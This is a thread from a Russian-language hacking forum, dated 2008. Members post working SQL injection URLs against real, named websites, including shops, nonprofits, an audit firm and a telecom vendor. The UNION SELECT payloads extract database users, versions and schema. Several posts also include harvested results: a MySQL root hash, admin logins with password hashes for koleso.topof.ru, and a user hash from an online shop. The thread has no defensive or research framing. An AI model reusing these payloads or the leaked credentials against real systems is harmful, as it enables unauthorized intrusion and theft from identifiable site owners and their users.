ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.03.2008, 18:48
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
http://www.showbizlistings.com/
http://www.showbizlistings.com/_sbl_listings/classes_n_photographers_list.php?__id=-1+UNION+SELECT+1,CONCAT_WS(0x3A,USER(),VERSION(),D ATABASE()),3,4,5,6,7,8,9,10,11/*
http://www.hillelatucf.com/
http://www.hillelatucf.com/main.php?page=events_full&__id=-1+UNION+SELECT+1,2,3,4,5,6,7,CONCAT_WS(0x3A,USER() ,VERSION(),DATABASE()),9,10,11,12,13/*
http://www.oregonwineconnection.com/
http://www.oregonwineconnection.com/vieworegonwineries.php?__id=-1+UNION+SELECT+CONCAT_WS(0x3A,USER(),VERSION(),DAT ABASE()),2,3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.webeatforeclosure.com/
http://www.webeatforeclosure.com/index.php?__id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11/*&__cid=2
В последнем вывода нету, если интересно, то можно поиграть с подзапросами, прочитав предварительно статью 1dt.w0lf'a.
|
|
|
30.03.2008, 19:04
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
Сообщение от А®ТеS
http://www.au-pair-box.com/
Есть file_priv, magic_quotes_gpc=off
http://www.au-pair-box.com/FORMfields/examples/gebot/fview_shorttimeemployment.php?__id=-1+UNION+SELECT+concat_ws(0x2A,user,password),2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mysq l.user/*
root*7a284bd27d344a90
Последний раз редактировалось FaR-G9; 30.03.2008 в 19:09..
|
|
|
|
30.03.2008, 19:21
|
|
Новичок
Регистрация: 04.01.2008
Сообщений: 6
Провел на форуме:
24208
Репутация:
21
|
|
http://www.bigfork.org/memberCategory.php?CategoryID=null/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,conca t_ws(0x202d20,version(),user(),database())/*
http://www.fetes.org/Category.php?CategoryID=null/**/UNION/**/SELECT/**/concat_ws(0x202d20,version(),user(),database())/*
http://www.ebalongolf.com/products.php?CatID=null/**/UNION/**/SELECT/**/1,2,concat_ws(0x202d20,version(),user(),database() ),4,5,6,7,8,9,10,11,12,13/*
http://www.ocasi.org/index.php?catid=null/**/UNION/**/SELECT/**/concat_ws(0x202d20,version(),user(),database()),2/*
http://ghjobs.org/index.php?pgid=null/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x20 2d20,version(),user(),database())/*
http://www.webcall95.com/index.php?pgid='UNION/**/SELECT/**/1,2,concat_ws(0x202d20,version(),user(),database() ),4,5,6,7/*
http://www.mysliborski.art.pl/gallery_sv.php?katId=null+UNION+SELECT+1,concat_ws (0x202d20,version(),user(),database()),3,4,5,6--
Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on?
I tried to hex-encode the path, but no file is created then.
|
|
|
|
31.03.2008, 10:13
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290
Репутация:
474
|
|
Australian Open Shop
SQL inj:
Код:
http://www.australianopenshop.com/category.php?id=5+and+1=0+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12/*
5.0.27-community-nt
Есть таблица tbluser, и колонки txtusername, txtpassword
Код:
http://www.australianopenshop.com/category.php?id=5+and+1=0+UNION+SELECT+1,column_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x74626c75736572+limit+1,1/*
Получем имя и хэш:
Код:
http://www.australianopenshop.com/category.php?id=5+and+1=0+UNION+SELECT+1,concat_ws(0x3a,txtusername,txtpassword),3,4,5,6,7,8,9,10,11,12+from+tbluser/*
jowang:b997cf0fe04484502df1f089789efaad |
|
|
|
31.03.2008, 11:58
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.homeservice.md/else.php?type_of=-1+union+select+1,2,version(),4,5,6,7,8,9,0/*
Version 5.0.45
User 18436@localhost
DB 18436
|
|
|
|
31.03.2008, 16:51
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
Техцентр www.nivus.ru
http://www.nivus.ru/prices/?model=-3+union+select+1,2,user(),database(),version()/*
информационный ресурс о шинах, колесных дисках, их производителях и продавцах
http://koleso.topof.ru/news.php?pID=-3058+union+select+1,2,3,4,concat_ws(char(58),TABLE _SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10+from+IN FORMATION_SCHEMA.COLUMNS/*
http://koleso.topof.ru/news.php?pID=-3058+union+select+1,2,3,4,concat_ws(char(58),admin _name,admin_login,admin_password),6,7,8,9,10+from+ admins/*
Superadmin:topof:33d51f16ddaf72afb581e2a223c602a1: 4f
News admin:news:fdec339b918fa60443230ce41283de6b:39
Tyre admin:tyre:eee718e1b60f0c56550c1eaecd924f26:ca
Disc admin:disk:18a6699dd4b5e1442dbdd1e9dcea78f9:7e
Auto admin:auto:06ea27e74223350ee155a71ca04e726e:07
v.savosin:v.savosin:1ca91037401683b596009b56b9b473 ef:7f
hadmin:hadmin:9aa2eb5106a1dfacfba636314142ef94:89
http://koleso.topof.ru/admin/login.php
|
|
|
|
31.03.2008, 17:01
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
_http://www.sex-shop.ru/kernel.php?section=items%2Fpresentations&action=sh ow&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39/*
1 место в гугле  _http://www.google.com/search?q=%D1%81%D0%B5%D0%BA%D1%81+%D1%88%D0%BE%D0% BF&sourceid=opera&num=0&ie=utf-8&oe=utf-8
Версия 5  |
|
|
|
31.03.2008, 18:09
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
On Conference. Организация и проведение конференций.
http://www.onconference.ru/conferences/index.html?id=-58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40/*
Аудиторская фирма "Корн-Аудит"
http://cornaudit.ru/sitenews.php?link=-245+union+select+1,2,3,user(),database(),version() ,7,8/*
Компания Zelax является ведущим российским разработчиком и производителем решений для сетей передачи данных.
http://www.zelax.ru/events/news_telecom/new?newsid=-1168+union+select+1,2,concat(user(),char(58),datab ase(),char(58),version()),4,5,6,7/*
|
|
|
|
31.03.2008, 19:21
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
http://www.advocat-volodarsky.kiev.ua/index.php?id=23+UNION+SELECT+1,2,3+LIMIT+1,1/*
vvlaw@hosting01.iptelecom.net.ua
volodarsky
4.1.22-log
//**********************************
http://www.htfi.ru/?p=24+UNION+SELECT+1,2,3+LIMIT+1,1/*
us2623d@localhost
5.0.45
db2623b
Последний раз редактировалось neon_fx; 31.03.2008 в 19:34..
|
|
|
|
31.03.2008, 21:50
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Код:
http://www.ritambhara.com/unit.php?typeid=-530/**/union/**/select/**/1,2,version(),4/*
ritambha_shop
4.0.27-max-log
ritambha_shop@v18.valuehost.ru
есть phpbb, но доступа к таблицам наверное нет  |
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
